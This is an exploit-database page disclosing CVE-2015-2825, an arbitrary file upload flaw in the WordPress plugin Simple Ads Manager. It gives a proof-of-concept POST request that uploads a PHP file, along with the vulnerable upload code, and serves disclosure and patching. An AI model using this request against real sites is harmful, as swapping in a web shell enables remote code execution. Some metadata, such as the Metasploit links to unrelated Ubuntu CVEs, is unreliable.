header-logo
Suggest Exploit
vendor:
Simple Ads Manager
by:
Tran Dinh Tien & ITAS Team
8.8
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: Simple Ads Manager
Affected Version From: Simple Ads Manager 2.5.94
Affected Version To: Simple Ads Manager 2.5.94
Patch Exists: YES
Related CWE: CVE-2015-2825
CPE: a:wordpress:simple_ads_manager
Metasploit: https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6770/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6787/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6765/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6766/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6767/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6768/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6769/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6771/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6772/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6773/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6777/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6782/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6784/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6785/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-6786/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-8478/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=87195https://www.infosecmatter.com/nessus-plugin-library/?id=87289https://www.infosecmatter.com/nessus-plugin-library/?id=87206https://www.infosecmatter.com/nessus-plugin-library/?id=70257https://www.infosecmatter.com/nessus-plugin-library/?id=69984
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2015

WordPress plugin Simple Ads Manager – Arbitrary File Upload

A vulnerability in the Wordpress plugin Simple Ads Manager allows an attacker to upload arbitrary files to the server. This is due to the lack of proper validation of the uploaded file in the 'sam-ajax-admin.php' file from line 303 to 314. This can be exploited to upload malicious files and execute arbitrary code on the server.

Mitigation:

Update the plugin to the latest version
Source

Exploit-DB raw data:

#Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File Upload
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2825
#Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team


::PROOF OF CONCEPT::

+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: targer.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------108989518220095255551617421026
Content-Length: 683

-----------------------------108989518220095255551617421026
Content-Disposition: form-data; name="uploadfile"; filename="info.php"
Content-Type: application/x-php

<?php phpinfo(); ?>
-----------------------------108989518220095255551617421026
Content-Disposition: form-data; name="action"

upload_ad_image
-----------------------------108989518220095255551617421026—


+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php

+ Vulnerable code: from line 303 to 314

    case 'sam_ajax_upload_ad_image':
      if(isset($_POST['path'])) {
        $uploadDir = $_POST['path'];
        $file = $uploadDir . basename($_FILES['uploadfile']['name']);

        if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) {
          $out = array('status' => "success");
        } else {
          $out = array('status' => "error");
        }
      }
      break;
	  
	  
+ REFERENCE: 
- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en
- https://www.youtube.com/watch?v=8IU9EtUTkxI

Navigation

Suggest Exploit

Services By CQR